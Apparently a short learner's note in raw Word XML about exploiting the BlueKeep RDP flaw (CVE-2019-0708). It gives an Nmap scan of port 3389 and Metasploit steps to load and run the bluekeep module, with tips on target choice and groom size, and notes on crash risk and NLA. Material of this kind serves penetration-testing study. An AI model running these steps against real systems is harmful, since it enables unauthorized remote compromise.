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9347" w14:textId="4E4D1FFB" w:rsidR="00853ABF" w:rsidRPr="008B5077" w:rsidRDefault="00A4369A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B5077">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting Windows CVE-2019-0708 RDP Vulnerability (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B5077">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BlueKeep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B5077">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B5077">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F37DC" w14:textId="68539F83" w:rsidR="00A4369A" w:rsidRDefault="000079B9">
      <w:r>
        <w:t>Arbitrary commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1441A5E2" w14:textId="56F8316D" w:rsidR="00A4369A" w:rsidRDefault="00A4369A">
      <w:r>
        <w:t>Attacker Gain access to a chunk of the kernel memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D8A702" w14:textId="6F953668" w:rsidR="00A4369A" w:rsidRDefault="000079B9">
      <w:r>
        <w:t xml:space="preserve">Give </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>previliged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980117B" w14:textId="23F7F112" w:rsidR="00E42C30" w:rsidRDefault="00E42C30">
      <w:r>
        <w:t xml:space="preserve">There is no legitimate exploit of this vulnerability as it is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dislosed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the Microsoft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A615A19" w14:textId="3BB5CE3F" w:rsidR="008B5077" w:rsidRDefault="00B00EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B00EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160B820D" w14:textId="02AE49D1" w:rsidR="00B870BC" w:rsidRPr="00B870BC" w:rsidRDefault="00B870BC">
      <w:r>
        <w:t xml:space="preserve">Nmap -s V -p 3389 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F2C0492" w14:textId="3991CB11" w:rsidR="00B00EA6" w:rsidRDefault="00B870BC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00C562CC" w14:textId="19E7A566" w:rsidR="00B870BC" w:rsidRDefault="00B870BC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC84C46" w14:textId="002C576F" w:rsidR="00B870BC" w:rsidRDefault="00B870BC">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bluekeep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16E18122" w14:textId="5F73DF17" w:rsidR="00B870BC" w:rsidRDefault="00B870BC">
      <w:r>
        <w:t>Use (num)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DECF469" w14:textId="56DCE408" w:rsidR="00B870BC" w:rsidRDefault="00B870BC">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C35C9DF" w14:textId="4B7430E0" w:rsidR="00B870BC" w:rsidRDefault="00B870BC">
      <w:r>
        <w:t>Set values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3643CA38" w14:textId="6C6EBAF2" w:rsidR="00B870BC" w:rsidRDefault="00B870BC">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431D1016" w14:textId="77777777" w:rsidR="00B870BC" w:rsidRDefault="00B870BC"/>
    <w:p w14:paraId="4FE0DB5D" w14:textId="313501F2" w:rsidR="003033E8" w:rsidRDefault="003033E8">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bad-config error occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56611D2E" w14:textId="77777777" w:rsidR="003033E8" w:rsidRDefault="003033E8" w:rsidP="003033E8">
      <w:r>
        <w:t>Show target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593EB98C" w14:textId="3721A0B5" w:rsidR="003033E8" w:rsidRDefault="003033E8">
      <w:r>
        <w:t>Use (num)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45997E9A" w14:textId="00F79912" w:rsidR="003033E8" w:rsidRDefault="003033E8">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A341F7" w14:textId="77777777" w:rsidR="000079B9" w:rsidRDefault="000079B9"/>
    <w:p w14:paraId="3CFB701C" w14:textId="7EA2E50F" w:rsidR="000079B9" w:rsidRDefault="00A73B82">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>failed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> modify the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>groom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> size as by default it is 250MB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0F3EDD" w14:textId="77777777" w:rsidR="00B363E4" w:rsidRDefault="00B363E4"/>
    <w:p w14:paraId="643D489A" w14:textId="5F74E425" w:rsidR="000079B9" w:rsidRPr="000079B9" w:rsidRDefault="000079B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000079B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1AE2C" w14:textId="6E3516A5" w:rsidR="000079B9" w:rsidRDefault="00D064AD">
      <w:r>
        <w:t>Executing</w:t>
      </w:r>
      <w:r w:rsidR="000079B9">
        <w:t xml:space="preserve"> code at the kernel level my clash the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF68AF6" w14:textId="31A3853E" w:rsidR="00D064AD" w:rsidRDefault="00D064AD">
      <w:r>
        <w:t>Targeting the kernel space memory may crash the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B82DF84" w14:textId="55B6774B" w:rsidR="000079B9" w:rsidRDefault="008B5077">
      <w:r>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">network level </w:t>
      </w:r>
      <w:r w:rsidR="00D064AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">authentication </w:t>
      </w:r>
      <w:r w:rsidR="00D064AD">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D064AD">
        <w:t>enabled,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then this vulnerability is </w:t>
      </w:r>
      <w:r w:rsidR="00D064AD">
        <w:t>failed</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00007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5F"/>
    <w:rsid w:val="000079B9"/>
    <w:rsid w:val="0012751C"/>
    <w:rsid w:val="002B4B83"/>
    <w:rsid w:val="003033E8"/>
    <w:rsid w:val="003E1827"/>
    <w:rsid w:val="004D2205"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008B5077"/>
    <w:rsid w:val="00A4369A"/>
    <w:rsid w:val="00A73B82"/>
    <w:rsid w:val="00B00EA6"/>
    <w:rsid w:val="00B3395F"/>
    <w:rsid w:val="00B363E4"/>
    <w:rsid w:val="00B870BC"/>
    <w:rsid w:val="00D064AD"/>
    <w:rsid w:val="00DA7EB9"/>
    <w:rsid w:val="00E4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D8E2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{563FC6EA-17CC-420F-914D-CF141E66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32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-27T18:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-27T18:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>